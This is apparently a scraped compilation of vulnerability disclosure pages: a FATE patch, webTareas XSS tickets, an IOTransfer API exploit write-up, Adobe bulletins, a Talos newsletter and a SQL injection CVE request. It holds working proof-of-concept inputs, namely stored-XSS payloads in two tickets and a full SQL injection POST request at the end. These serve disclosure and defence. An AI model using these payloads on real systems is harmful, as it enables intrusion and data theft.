An issue was discovered in function sync_tree in hetero_decision_tree_guest.py in WeBank FATE (Federated AI Technology Enabler) 0.1 through 1.4.2 allows attackers to read sensitive information during the training process of machine learning joint modeling.

@@ -529,10 +529,23 @@ def redispatch\_node(self, dep=-1, max\_depth\_reach=False):

unleaf\_state\_nodeid1) \== 2 else unleaf\_state\_nodeid2)

self.node\_dispatch \= self.node\_dispatch.union(dispatch\_guest\_result)

  

def remove\_sensitive\_info(self):

"""

host is not allowed to get weights/g/h

"""

new\_tree\_ \= copy.deepcopy(self.tree\_)

for node in new\_tree\_:

node.weight \= None

node.sum\_grad \= None

node.sum\_hess \= None

  

return new\_tree\_

  

def sync\_tree(self):

LOGGER.info("sync tree to host")

  

self.transfer\_inst.tree.remote(self.tree\_,

tree\_nodes \= self.remove\_sensitive\_info()

self.transfer\_inst.tree.remote(tree\_nodes,

role\=consts.HOST,

idx\=\-1)

"""

CVE-2020-25459: remove sensitive info of guest sending to host · FederatedAI/FATE@6feccf6

Cross Site Scripting (XSS) vulnerability in webTareas 2.2p1 via the Name field to /projects/editproject.php.

*   Summary
*   Files
*   Reviews
*   Support
*   Code
*   Tickets
*   News

Menu ▾ ▴

Milestone: 2.2

Status: closed

Updated: 2021-07-07

Created: 2021-07-07

Private: No

**Describe the bug**  
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Projects" feature.  
**To Reproduce**  
1\. Login into the panel  
2\. Go to Documents: 'webtareas/linkedcontent/listfiles.php?doc\_type=0&id=0'  
3\. Click Add Projects: 'webtareas/linkedcontent/editfolder.php?parent=0'  
4\. Insert Payload in "Name" Documents: "><im g="" src="xx" onerror="alert('xssss')">  
5\. Boom xss alert!  
**  
Impact**  
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.  
Desktop (please complete the following information):  
OS: Windows  
Browser: ALL  
**imgae poc:**</im>

**2 Attachments**

**Discussion**

Log in to post a comment.

CVE-2021-36608: webTareas / Tickets / #44 Cross Site Script Vulnerability on "Documents" in webtareas feature v2.2p1

Cross Site Scripting (XSS) vulnerability in webTareas 2.2p1 via the Name field to /linkedcontent/editfolder.php.

**Describe the bug**  
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Projects" feature.  
**To Reproduce**  
1\. Login into the panel  
2\. Go to 'webtareas/projects/listprojects.php?'  
3\. Click Add Projects: 'webtareas/projects/editproject.php'  
4\. Insert Payload in "Name" Projects: "><im g="" src="xx" onerror="alert(document.domain)">  
5\. Boom xss alert!  
6\. home page click "Calendar": 'webtareas/general/home.php?msg=noWorkCalendar' >> xss alert message.</im>

**Impact**  
Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user’s machine under the guise of the vulnerable site.  
**Desktop (please complete the following information):**  
OS: Windows  
Browser: ALL  
**Video POC**

CVE-2021-36609: webTareas / Tickets / #43 Cross Site Script Vulnerability on "Projects" in webtareas feature v2.2p1

Update allows BlastShield users to link with hybrid cloud network providers like AWS, Google, and the most recent addition, Azure, in one secure environment.

**Palo Alto, Calif. – June 16, 2022 –** BlastWave, a zero-trust networking solution provider that reduces the cost and complexity of remote access VPN management, today announced enhancements to its zero-trust security software solution, BlastShield_™_. The enhancements include added security capability for the three main cloud service providers, identity manager unification, Azure gateway security integration and easy bulk onboarding. BlastWave sees these updates as increasingly important with the global workforce shift to remote cloud environments on multiple vendor platforms.

The recent update allows BlastShield users to link with hybrid cloud network providers like AWS, Google, and the most recent addition, Azure, in one secure environment without forcing a user to rely on the respective security measures of each provider. This means users can have workloads distributed across provider environments but only one user authentication system. The update continues BlastWave’s mission of convenient, cutting-edge cybersecurity, all while offering enhanced protection within identity management systems. Most importantly, users can take advantage of BlastShield’s heightened speed and functionality, two vital features in multi-functional, cloud environments.

This latest update also adds support for gateway security in Azure environments, expanding on BlastShield’s previous gateway security capabilities in GCP, AWS, ESXi and COTS hardware systems. This new gateway security integration increases functionality for Azure users, allowing them to rely on password-less authentication instead of dated VPN security measures within their cloud-based Azure environments.

BlastShield’s latest update streamlines bulk onboarding, a typically arduous process, leveraging customers’ SSO functionality. This update’s features rely on an industry-standard API, System for Cross-domain Identity Management (SCIM), designed to simplify the management of user identities in cloud-based services as well as applications. It enables the automatic exchange of user information between identity domains, eliminating the insecure provisioning of identity managers when onboarding large numbers of users in distributed cloud environments. Identity managers have conventionally suffered from potential exposure to credential theft, SIM jacking, and other threat vectors. BlastShield’s update addresses these vulnerabilities without hampering the convenience of identity managers.

“BlastShield’s latest update enhances our proven security mechanisms with single sign-on identity management tools and offers simplified bulk onboarding,” said Michael Bacon, BlastWave Solution Engineer. “Many competitors are focusing more on endpoint security in these hybrid cloud environments, but we’re offering a macro-level security approach that combines the convenience of identity management systems like Okta and One Identity with the proven agile security of BlastShield’s network-level ZTNA and microsegmentation.”

The recent software update and resulting functionality are automatic for new subscribers and can be implemented with the click of a button in the BlastShield interface for current professional and enterprise customers.

“In the past, cybersecurity may have elicited groans from providers, largely due to its perceived inconvenience. This update lends BlastWave’s proven security stack to the login convenience offered by established identity managers,” said Mel Knight, Brier and Thorn CISO. “Once again, whether through bulk onboarding via secure provisioning or enhanced Azure environment security, BlastWave continues to imbue existing technologies with their patented, proven ZTNA security solution. We are excited for our customers to experience this update’s improved, secure convenience, bulk onboarding, and multi-vendor cloud security.”

\# # #

**About BlastWave**

Founded by former executives and technologists from Apple and Cisco, BlastWave is taking a fundamentally different approach to security aimed at protecting privacy and connected devices from cyberattacks. BlastWave’s patented product, BlastShield™️, is an integrated, zero-trust stack that combines state-of-the-art passwordless multi-factor authentication with high-performance, resilient encrypted connectivity and built-in microsegmentation. BlastWave is backed by Rocket Strategies, Lucas Venture Group, and Millennium Investments. The company is headquartered in Palo Alto, California. To learn more, visit www.blastwave.io and follow us on LinkedIn and Twitter @blastwaveinc.

BlastWave Announces Enhancements to Its Zero-Trust Security Software Solution, BlastShield

In IOBit IOTransfer 4.3.1.1561, an unauthenticated attacker can send GET and POST requests to Airserv and gain arbitrary read/write access to the entire file-system (with admin privileges) on the victim's endpoint, which can result in data theft and remote code execution.

****Background****

Continuing the series about IPC vulnerabilities today we will look at another Chinese company, IObit.

IOTransfer by IObit is a program that allows the user to transfer files between their iPhone and their PC supposedly competing with apple’s iTunes. In order to operate IObit uses a node JS server for communication. The API is not obfuscated and does not contain any access control checks or any security measures at all. Understanding this communication can lead to arbitrary reading and writing to any location on the computer which can naturally lead to RCE with a bit of creativity.

****Finding the first lead****

Starting with process hacker I found that “IOtransfer” is deploying a process that listens actively over TCP. By its logo it seemed like a node.js application

AirServ listening

Going over the details available in process hacker I found that the process is running with elevated privileges

AirServ Privileges

The process was executed with a command-line ending in “iot\_filetransfer.js” and the file details revealed it’s indeed a node.js server.

AirServ command line

Looking at the structure of the folder containing AirServ.exe we can see that the API is comprised from 5 files

folder structure

After opening “iot\_filetransfer.js” I could clearly see that:

1) The file was the “main” of the API implementation

2) There is no obfuscation of the code

3) There seems to be two different types of listeners one for GET methods and one for POST methods

GET API Handler init

POST API Handler init

After making sure there is an ‘action’ parameter defined in the request the server will send the request to a dispatch function. This function is a parser for the actual requested method

Among those methods two are particularly interesting: “DOWNLOAD\_FILE”, “UPLOAD\_FILE”

****Code Review****

AirServ is using a system of tasks to execute its actions it was probably implemented this way so the server will be able to keep track of what was downloaded/uploaded and to perform actions concurrently

In order to upload/download a file, the user must specify a taskID while the userID can be anything…

In order to get a taskid the user first needs to create a new task

The task should contain the following fields:

After sending these fields with the correct request the JS server will conveniently send a new taskID as a response:

After creating the task we need to set the details for it in a follow-up request

Size -the size of the file we want to upload

Savedfilepath -The path we want to upload a file to

Fullpath -not used so it can be any string

MD5 -not checked so it can be any string

Filetype -set to 3 in order to allow path traversal

The last request is for the function “newuploadtask” with the local file we want to upload as the data.

This request will trigger the execution of the task we created coupled with the data we sent to create a file in our desired folder.

This is the complete flow I used to create a payload in the target machine:

A very similar procedure can be used to download files from any location in the target machine to a remote computer

****Conclusion****

IOTransfer’s AirServ lacks any kind of security measures. Even basic security measures such as obfuscation are not present. The fact that the service is running with ADMIN privileges is a major security hole. Blue Team personal should be aware of this and block IOTransfer communication port (7193) when not in use.

Github POC: https://github.com/tomerpeled92/CVE/blob/main/CVE-2022%E2%80%9324562

****Disclosure timeline****

24/01/2022 - disclosed vulnerabilities to Iobit

29/01/2022 - Iobit emailed us saying they will analyze the information

05/02/2022 -RCE disclosed to IOtransfer no response

07/02/2022-2nd mail sent to IOtransfer team

21/02/2022- CVE number received from MITRE for the RCE (CVE-2022–24562)

03/03/2022 -CVE numbers received from MITRE for the 4 other vulnerabilities

07/03/2022-3rd mail sent to IOTransfer team no transfer

08/03/2022 - email sent to iobit again

29/05/2022 - Final email sent to iobit containing this document

15/06/2022- Article published

CVE-2022-24562: Exploiting IOTransfer insecure API CVE-2022–24562 - Tomer Peled - Medium

Adobe Animate version 22.0.5 (and earlier) is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security updates available for Adobe Animate | APSB22-24

Bulletin ID

Date Published

Priority

ASPB22-24

June 14, 2022    

3

**Summary**

Adobe has released an update for Adobe Animate. This update resolves a critical vulnerability.  Successful exploitation could lead to arbitrary code execution in the context of the current user.        

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Animate

22.0.5 and earlier versions

Windows and macOS

**Solution**

Adobe categorizes this update with the following  priority rating and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority

Availability

Adobe Animate 2021       

21.0.11           

Windows and macOS  

3

Download Center  

Adobe Animate  2022      

22.0.6

Windows and macOS

3

Download Center       

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.  

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30664  

**Acknowledgments**

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-30664)

**Revisions**

August 21, 2021: Added N-1 version details under the solution section.  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-30664: Adobe Security Bulletin

Adobe InCopy versions 17.2 (and earlier) and 16.4.1 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InCopy | APSB22-29

**Bulletin ID**

**Date Published**

**Priority**

APSB22-29

June 14, 2022

3

**Summary**

Adobe has released a security update for Adobe InCopy.  This update addresses multiple  critical vulnerabilities. Successful exploitation could lead to arbitrary code execution.                      

**Affected versions**

16.4.1 and earlier version  

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InCopy Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InCopy   

17.3  

Windows  and macOS    

3

Adobe InCopy   

16.4.2  

Windows  and macOS    

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30650  

Out-of-bounds Read (CWE-125)  

Arbitrary code execution  

Critical 

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30651  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30652  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30653  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30654  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30655  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30656  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30657  

**Acknowledgments**

Adobe would like to thank the following researchers for reporting this issue and for working with Adobe to help protect our customers.  

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-30650, CVE-2022-30651, CVE-2022-30652, CVE-2022-30653, CVE-2022-30654, CVE-2022-30655, CVE-2022-30656, CVE-2022-30657)

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2022-30650: Adobe Security Bulletin

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
I’m still decompressing from Cisco Live and the most human interaction I’ve had in a year and a half.  
But after spending a few days on the show floor and interacting with everyone, there are a...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

I’m still decompressing from Cisco Live and the most human interaction I’ve had in a year and a half.  

But after spending a few days on the show floor and interacting with everyone, there are a few things that stand out to me about the state of security and what people are interested in at Cisco Live. So, I wanted to take some time to highlight a few things that stood out to me at this year’s Cisco Live. _Editor's note: The Threat Source newsletter will be on a summer break next week, so no new edition!_ 

**Don’t think about the worst **

A lot of our lightning talks at the Cisco Secure Pub this week centered around some crazy days, many of which left us scrambling — the Colonial Pipeline ransomware attack, Log4J, Kaseya, you name it. The problem is no one wants to think about how awful these days are. 

During these talks, I saw a lot of heads in the audience nodding around how we need to be prepared for the worst, but no one wants to talk about that. Who wants to be the one to predict the next Log4J? Unfortunately, it’s going to happen, we just don’t know when. That’s why things like Incident Response plans and playbooks are so important. 

You may not want to talk about the toughest day of your professional career, but it’s going to come, so we may as well embrace it and be ready. 

**A wink and a nod **

Speaking of these major incidents, it seems like a ton of major security events have happened since the last Cisco Live in person. While they were happening, it was all anyone could talk about. But in person, words like “SolarWinds” and “Kaseya” were all spoken in hush tones or were just vaguely referenced to in-person like “back then” or “the dark times.”  

If we are going to truly learn from these events, I feel like we need to speak about them openly and honestly. I try to have a judgment-free security zone because eventually, a breach is going to happen to everyone. So the point is not to shame someone when it happens, we should be discussing the lessons learned openly so we can do better next time, rather than trying to brush it under the rug. 

During these stretches, we were all busy and stressed and it made for some late nights. That’s OK, and it should be OK to talk about that, even if you’re within earshot of someone who was involved.

**We can’t replicate everything over the internet **

The future is hybrid work, there’s no doubt about it. And I’d be the first person to tell you I prefer working from home versus commuting to the office today. But I must admit — it’s tough to replicate the connections at conferences and shows over Webex. 

Meetings and 1:1 check-ins work great for virtual meeting platforms, but there’s something about just making a personal connection in-person to a stranger. I was working at the Talos booth this week and struck up a conversation with someone who worked in network operations for an NFL team. Being a huge NFL fan, I had all sorts of questions to ask about the ins and outs of his job and the organization, especially given Cisco Talos Incident Response’s recent work at the Super Bowl and NFL draft. 

Unfortunately, this isn’t something we’ve been able to capture virtually. That operations person and I exchanged information on what we’re seeing in the field, what pain points exist and even got to talking about the NFL offseason. My wife, boss and parents would be shocked to hear me say this — but I actually missed talking to people in person.    

**The one big thing **

Microsoft’s Patch Tuesday for this month included 40 high-severity vulnerabilities, including one critical issue. The most serious issue is CVE-2022-30136, a remote code execution vulnerability in the Windows Network File System (NFS) service, version NFSv4.1, with a severity score of near-maximum 9.8. An attacker can exploit the vulnerability over the network by making an unauthenticated, specially crafted call to an NFS service to execute remote code. To mitigate this vulnerability, users are advised to disable the vulnerable version NFSV4.1 and restart the NFS server or reboot the machine. 

> **Why do I care? **This month’s round of updates also includes a fix for the high-profile Follina vulnerability disclosed a few weeks ago. Attackers are actively exploiting this in the wild to deliver malware, so this is especially important to patch for immediately. Also, this release marks the official end of Internet Explorer, the Microsoft browser that’s been around for more than 25 years. As of Tuesday, Microsoft stopped officially supporting most versions of Explorer and disabled the IE desktop application. All Explorer users are encouraged to switch over to Microsoft Edge (or another web browser).   
> **So now what? **Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. And it goes without saying, but all Microsoft users should update their products as soon as possible. 

**Other news of note**

U.S. defense contractor L3Harris is in talks to acquire the controversial Israeli tech company NSO Group, the creators of the Pegasus spyware. Pegasus is known to be used by threat actors to track unwilling targets, including activists, journalists and government leaders. This has set off alarm bells for privacy experts and those following national security, and some are even calling on the White House to preemptively block any sort of deal. NSO Group is currently on a U.S. blacklist for working “contrary to the foreign policy and national security interests of the U.S.” (The Guardian, Haaretz) 

Apple unveiled the newest version of its iOS operating system for iPhones last week, including several new security features and improvements. Users will no longer have to download standalone versions of the operating system to implement security updates, and instead, the patches will be installed automatically. Another new feature is the ability to edit and unsend iMessages. However, security and privacy experts worry this ability could allow stalkers, harassers, and abusers to contact their victims and then hide any trace of their messages, leading some people to call on Apple to change the feature. (9To5Mac, Mac Rumors) 

A newly discovered Linux malware is extremely difficult to detect while spreading silently across a network. Security researchers call this campaign “Symbiote,” and it's already been spotted in the wild. Symbiote infects running Linux processes and steals user credentials, gains rootkit functionality and installs a backdoor for remote access. Once it infects the processes, it can become difficult to detect by the typical security software, and some researchers are wondering if it’s even possible to detect this attack. (ThreatPost, Ars Technica) 

**Can’t get enough Talos? **

*   Boosting Security Resilience and Defending the IT Ecosystem
*   Businesses need to be more aggressive with their cyber security, Cisco warns
*   Cisco unveils sweeping new cloud capabilities, SASE and WAN forecasting offerings
*   Deepfake attacks expected to be next major threat to businesses  
    

  

**Upcoming events where you can find Talos **

**BlackHat** **U.S.** (Aug. 6 - 11, 2022)  
Las Vegas, Nevada 

**DEF CON U.S.** (Aug. 11 - 14, 2022)  
Las Vegas, Nevada 

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645    **MD5:** 2c8ea737a232fd03ab80db672d50a17a    **Typical Filename:** LwssPlayer.scr      
**Claimed Product:** 梦想之巅幻灯播放器      
**Detection Name:** Auto.125E12.241442.in02    

**SHA 256:** b2ef49a10d07df6db483e86516d2dfaaaa2f30f4a93dd152fa85f09f891cd049   
**MD5:** 067f9a24d630670f543d95a98cc199df **Typical Filename:** RzxDivert32.sys **Claimed Product:** WinDivert 1.4 driver   
**Detection Name:** W32.B2EF49A10D-95.SBX.TG 

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0 **MD5:** 8c69830a50fb85d8a794fa46643493b2   
**Typical Filename:** AAct.exe **Claimed Product:** N/A    
**Detection Name:** PUA.Win.Dropper.Generic::1201

Threat Source newsletter (June 16, 2022) — Three top takeaways from Cisco Live

Adobe InDesign versions 17.2.1 (and earlier) and 16.4.1 (and earlier) are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Update Available for Adobe InDesign | APSB22-30

**Bulletin ID**

**Date Published**

**Priority**

APSB22-30  

June 14, 2022   

3

**Summary**

Adobe has released a security update for Adobe InDesign.  This update addresses multiple critical vulnerabilities. Successful exploitation could lead to arbitrary code execution.  

**Affected versions**

17.2.1 and earlier versions  

16.4.1 and earlier versions  

**Solution**

Adobe categorizes these updates with the following priority rating and recommends users update their software installations via the Creative Cloud desktop app updater, or by navigating to the InDesign Help menu and clicking "Updates." For more information, please reference this help page.

**Product**

**Updated version**

**Platform**

**Priority rating**

Adobe InDesign

17.3  

Windows and macOS

3

Adobe InDesign

16.4.2  

Windows and macOS

3

For managed environments, IT administrators can use the Creative Cloud Packager to create deployment packages. Refer to this help page for more information.

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**    

**CVSS vector**   

**CVE Number**

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30658  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30659  

Heap-based Buffer Overflow (CWE-122)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30661  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30662  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30663  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30665  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-30660  

**Acknowledgments**

Adobe would like to thank the following researcher for reporting this issue and for working with Adobe to help protect our customers:   

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-30658, CVE-2022-30659, CVE-2022-30661, CVE-2022-30662, CVE-2022-30663, CVE-2022-30665, CVE-2022-30660)

CVE-2022-30658: Adobe Security Bulletin

Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the fullname parameter in add-directory.php.

\> \[Suggested description\]

\> Directory Management System v1.0 was discovered to contain a SQL

\> injection vulnerability via the fullname parameter in

\> add-directory.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> phpgurukul

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Directory Management System - 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> add-directory.php

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Information Disclosure\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> POST /dms/admin/add-directory.php HTTP/1.1

\> Host: ip

\> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0

\> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

\> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

\> Accept-Encoding: gzip, deflate

\> Content-Type: application/x-www-form-urlencoded

\> Content-Length: 178

\> Connection: close

\> Cookie: PHPSESSID=eml4bgiglhno5kgmjj8uld5qgs

\> Upgrade-Insecure-Requests: 1

\>

\> fullname=database()','$profession','$email','$mobilenumber','$address',database(),'$admsta')%23&profession=aaaa&email=aaa%40aaa.aaa&mobilenumber=aaa&city=aaa&address=aaaa&submit=

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> laotun

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> http://directory.com

\> http://phpgurukul.com

Use CVE-2022-31384.

Tag

#mac